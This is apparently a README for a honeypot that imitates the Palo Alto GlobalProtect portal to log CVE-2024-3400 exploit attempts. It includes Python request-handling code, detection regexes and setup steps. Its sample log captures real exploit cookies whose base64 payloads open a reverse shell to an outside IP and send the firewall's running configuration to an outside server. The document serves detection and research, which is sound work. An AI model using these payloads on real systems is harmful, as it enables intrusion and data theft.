Simple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability.
- Simulate the login page of the GlobalProtect Portal when `/global-protect/login.esp` is visited
- Simulate the HTTP request `POST /ssl-vpn/hipreport.esp` with the cookie `Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/<file>;`
- Extract the filename from the cookie (if present)
- Save the content of the POST request to the file
- Simulate the follow-up check: if the user requests `GET /global-protect/portal/images/<file>`, the user receives a 403 instead of a 404
- Collect the IP & User-Agent of the request
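The request handling listed above, as an added example that is not the project's own code: a minimal stand-in built on the standard library only (no Flask, plain HTTP on port 8443 instead of TLS on 443), with the cookie inspection split into its own function so it can be tested without a running server. The names `classify_cookie`, `Honeypot` and `DROP_DIR` are my own.

```python
import logging
import os
import re
from http.server import BaseHTTPRequestHandler, HTTPServer

logging.basicConfig(level=logging.INFO)
DROP_DIR = "captured"  # local directory for POST bodies attackers tried to plant (constructed name)
# traversal into the portal's images directory, used to plant a file that is fetched afterwards
FILE_DROP = re.compile(r"^/(?:\.\./)+var/appweb/sslvpndocs/global-protect/portal/images/([^/]+)$")
INJECTION = re.compile(r"`|\$\(")  # shell command substitution inside the value, as in the later log entries

def classify_cookie(cookie_header):  # -> (kind, filename); filename is only set for a file-drop probe
    m = re.search(r"(?:^|;\s*)SESSID=([^;]*)", cookie_header or "")
    if not m:
        return ("none", None)
    value = m.group(1)
    drop = FILE_DROP.match(value)
    if drop:
        return ("file-drop", drop.group(1))
    if INJECTION.search(value):
        return ("cmd-injection", None)
    return ("traversal", None) if "/../" in value else ("benign", None)

class Honeypot(BaseHTTPRequestHandler):
    def _reply(self, status, body=b""):
        self.send_response(status)
        self.end_headers()
        self.wfile.write(body)
    def do_GET(self):
        ip, ua = self.client_address[0], self.headers.get("User-Agent")
        if self.path == "/global-protect/login.esp":
            return self._reply(200, b"<html><body>GlobalProtect Portal</body></html>")
        if self.path.startswith("/global-protect/portal/images/"):  # 403 like PAN-OS; a 404 would expose the decoy
            logging.warning("Suspicious file requested - %s from %s, User-Agent: %s", os.path.basename(self.path), ip, ua)
            return self._reply(403)
        self._reply(404)
    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        ip, ua, cookie = self.client_address[0], self.headers.get("User-Agent"), self.headers.get("Cookie")
        kind, name = classify_cookie(cookie)
        logging.info("Request from %s, User-Agent: %s, Cookie: %s -> %s", ip, ua, cookie, kind)
        if kind == "file-drop":  # keep the body; basename() stops the attacker-chosen name escaping DROP_DIR
            os.makedirs(DROP_DIR, exist_ok=True)
            with open(os.path.join(DROP_DIR, os.path.basename(name)), "wb") as fh:
                fh.write(body)
            logging.warning("Detected suspicious file creation attempt: %s from %s", name, ip)
        self._reply(200)

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8443), Honeypot).serve_forever()  # plain HTTP; wrap the socket with ssl for 443
```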
- Python 3.x installed on your server.
- Python PIP
- `pip install flask`
- Generate a self-signed certificate and private key with OpenSSL:

```
$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [XX]:XX
State or Province Name (full name) []:XX
Locality Name (eg, city) [Default City]:
Organization Name (eg, company) [Default Company Ltd]:XX
Organizational Unit Name (eg, section) []:XX
Common Name (eg, your name or your server's hostname) []:XX
Email Address []:XX
```
- Remove the passphrase from the private key:

```
$ openssl rsa -in key.pem -out key1.pem
Enter pass phrase for key.pem:
writing RSA key
$ mv key1.pem key.pem
```
To start the honeypot, run the following command:

```
sudo nohup python3 CVE-2024-3400-pot.py &
disown
```
- Check whether the script is running:

```
sudo netstat -lnput | grep 443
tcp        0      0 0.0.0.0:443       0.0.0.0:*       LISTEN      1208/python3
sudo ps aux | grep <PID>
sonic     1208  0.0  3.5 189448 34364 pts/0    S    00:35   0:17 python3 CVE-2024-3400-pot.py
```
Sample log output from a running instance:

```
INFO:werkzeug:WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on https://127.0.0.1:443
 * Running on https://<IP>:443
INFO:werkzeug:Press CTRL+C to quit
INFO:root:Request from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36, Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/rdpj22uy8h.txt;
WARNING:root:Detected suspicious file creation attempt: rdpj22uy8h.txt from 45.61.138.35
INFO:werkzeug:45.61.138.35 - - [23/Apr/2024 01:31:56] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
WARNING:root:Suspicious file requested - rdpj22uy8h.txt from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO:werkzeug:45.61.138.35 - - [23/Apr/2024 01:31:56] "GET /global-protect/portal/images/rdpj22uy8h.txt HTTP/1.1" 403 -
WARNING:root:Suspicious file requested - rdpj22uy8h_test.txt from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO:root:Request from 158.255.213.74, User-Agent: python-requests/2.25.1, Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/test`echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTguMjU1LjIxMy43NC82MDU0NCAwPiYx|base64${IFS}-d|bash`
INFO:werkzeug:158.255.213.74 - - [23/Apr/2024 04:46:48] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
INFO:root:Request from 92.119.159.68, User-Agent: curl/7.58.0, Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/aaba`echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgb3M7IG9zLnBvcGVuKCJjdXJsIC1rIC1YIFBPU1QgLWQgQC9vcHQvcGFuY2ZnL21nbXQvc2F2ZWQtY29uZmlncy9ydW5uaW5nLWNvbmZpZy54bWwgaHR0cHM6Ly8xODUuMTA0LjE5NC40NzoxMDAwMiIpJw==|base64${IFS}-d|bash`
INFO:werkzeug:92.119.159.68 - - [24/Apr/2024 15:17:45] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
```